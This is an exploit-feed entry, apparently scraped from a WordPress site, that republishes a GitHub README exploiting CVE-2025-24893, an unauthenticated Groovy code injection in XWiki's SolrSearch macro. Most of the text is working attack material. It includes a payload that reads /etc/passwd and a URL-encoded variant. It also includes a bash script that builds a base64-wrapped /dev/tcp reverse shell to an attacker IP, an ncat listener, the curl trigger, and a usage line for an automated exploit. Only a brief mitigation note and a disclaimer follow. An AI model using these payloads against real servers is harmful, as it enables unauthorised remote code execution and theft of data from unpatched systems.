{“lastseen”:”2025-08-13T08:36:43″,”description”:”# CVE-2025-24893 \u2013 Unauthenticated Remote Code Execution in XWiki \\n\\n## 0 Table of Contents\\n1. [Summary](#1-summary)\\n2. [Vulnerability Details](#2-vulnerability-details)\\n3. [Affected Versions](#3-affected-versions)\\n4. [Proof-of-Concept](#5-proof-of-concept)\\n * 4.1 [Building the payload](#51-build-the-payload)\\n * 4.2 [Manual exploitation](#52-manual-exploitation)\\n * 4.3 [Automated python exploit](#53-automated-exploit)\\n5. [Mitigation](#6-mitigation)\\n6. [Credits \\u0026 References](#7-credits–references)\\n\\n—\\n\\n## 1 Summary \\n\\n* **CVE:** 2025-24893 \\n* **Component:** `SolrSearch` macro (XWiki UI) \\n* **Severity:** 9.8 \/ CRITICAL (CVSS 3.1) \\n* **Attack vector:** Unauthenticated HTTP GET \\n* **Impact:** Arbitrary Groovy execution \u2192 system-level RCE (permissions of the Jetty\/Tomcat user) \\n\\nThe `\/xwiki\/bin\/get\/Main\/SolrSearch` endpoint concatenates untrusted `text=` input\\nstraight into a Freemarker template. \\nBy prematurely closing the template and opening a new `{{groovy}} \u2026 {{\/groovy}}`\\nblock, an attacker executes arbitrary Groovy code without authentication.\\n\\n—\\n\\n## 2 Vulnerability Details \\n\\n“`\\nGET \/xwiki\/bin\/get\/Main\/SolrSearch?media=rss\\\\\\u0026text=\\u003e\\u003e HTTP\/1.1\\n““\\n\\n`SolrSearch` should embed the supplied text as plain content, but the macro\\nhandler **fails to escape `}}}`**, so the following happens:\\n\\n1. `}}}`\u2003closes the current Freemarker block. \\n2. Attacker opens a **new macro**: \\n“`xwiki\\n {{async async=false}}{{groovy}} \u2026 {{\/groovy}}{{\/async}}\\n“`\\n\\n* `async=false` forces synchronous execution (works even for guests).\\n\\n3. Groovy runs with the permissions of the XWiki JVM process.\\n\\nA minimal PoC that prints `\/etc\/passwd`:\\n\\n“`text\\n}}}{{async async=false}}{{groovy}}println(\\”cat \/etc\/passwd\\”.execute().text){{\/groovy}}{{\/async}}\\n“`\\n\\nURL-encoded variant (spaces \u2192 `%20`, braces \u2192 `%7B\/%7D`, etc.):\\n\\n“`\\n%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20\/etc\/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d\\n“`\\n\\n—\\n\\n## 3 Affected Versions \\n\\n| Branch | Fixed in | Vulnerable \u2264 |\\n| ——– | —————————————— | ——————————– |\\n| 15.x | **15.10.11** | 15.10.10\u2003(and all 15.9 \/ 15.8 \u2026) |\\n| 14.x LTS | **14.10.17** | 14.10.16 |\\n| 13 \/ 12 | **Not maintained** \u2013 all remain vulnerable | |\\n\\n*(source: [OffSec advisory](https:\/\/www.offsec.com\/blog\/cve-2025-24893\/) \\u0026 XWiki\\nSEC-S 2025-02)*\\n\\n\\n\\n—\\n\\n## 5 Proof of Concept \\n\\n### 5.1 Build the payload \\n\\n“`bash\\nRHOST=\\”editor.htb:8080\\”\\nLHOST=\\”10.10.14.8\\”\\nLPORT=4444\\n\\n# 1. one-liner reverse shell\\nSHELL=\\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/$LHOST\/$LPORT 0\\u003e\\u00261’\\”\\n\\n# 2. Base64 (single line)\\nB64=$(echo -n \\”$SHELL\\” | base64 -w0)\\n\\n# 3. wrap in Groovy macro\\nRAW=’}}}{{async async=false}}{{groovy}}\\”bash -c {echo,’$B64′}|{base64,-d}|{bash,-i}\\”.execute(){{\/groovy}}{{\/async}}’\\n\\n# 4. URL-encode\\nPAYLOAD=$(python3 -c \\”import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=”))\\” \\”$RAW\\”)\\n“`\\n\\n### 5.2 Manual exploitation \\n\\n“`bash\\n# start listener\\nsudo ncat -lvnp 4444\\n\\n# trigger exploit\\ncurl \\”http:\/\/$RHOST\/xwiki\/bin\/get\/Main\/SolrSearch?media=rss\\u0026text=${PAYLOAD}\\”\\n“`\\n\\n### 5.3 Automated exploit \\n\\n`xwiki_solr_rce.py` ships in `exploit\/` (see code block below).\\n\\n“`bash\\npython CVE-2025-24893.py -u -l -p \\n“`\\nwhere\\n“`\\n – URL including http:\/\/ or https:\/\/\\n“`\\n*(pass `-c \\”id\\”` to run an arbitrary command instead of a shell)*\\n\\n\\n\\n—\\n\\n## 6 Mitigation \\n\\n* **Upgrade** to **15.10.11** \/ **14.10.17** or later\\n* Temporary workaround: disable the macro\\n\\n“`properties\\n# \/etc\/xwiki\/xwiki.properties\\nsolr.search.enabled = false\\n“`\\n\\n—\\n\\n## 7 Credits \\u0026 References \\n\\n* OffSec Research: \u201cUnauth RCE in XWiki\u201d \u2013 20 Feb 2025\\n* NVD entry: [https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-24893](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-24893)\\n* [Exploit-DB #52136](https:\/\/www.exploit-db.com\/exploits\/52136)\\n\\n\\u003e Research \\u0026 PoC: **DeX1d**\\n\\n—\\n\\n\\u003eDisclaimer:\u2003For educational use only. Running this against systems you do not own is illegal.\\n”,”published”:”2025-08-07T10:20:22″,”modified”:”2025-08-09T10:15:33″,”type”:”githubexploit”,”title”:”Exploit for Code Injection in Xwiki”,”source”:””,”references”:””,”id”:”3FC9E9A2-42CE-552A-A046-E205E2471000″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-24893″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/github.com\/IIIeJlyXaKapToIIIKu\/CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-13T08:36:43″,”description”:”# CVE-2025-24893 \u2013 Unauthenticated Remote Code Execution in XWiki \\n\\n## 0 Table of Contents\\n1. [Summary](#1-summary)\\n2. [Vulnerability Details](#2-vulnerability-details)\\n3. [Affected Versions](#3-affected-versions)\\n4. [Proof-of-Concept](#5-proof-of-concept)\\n * 4.1 [Building the payload](#51-build-the-payload)\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,32,13,7,11,5],"class_list":["post-10532","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-githubexploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n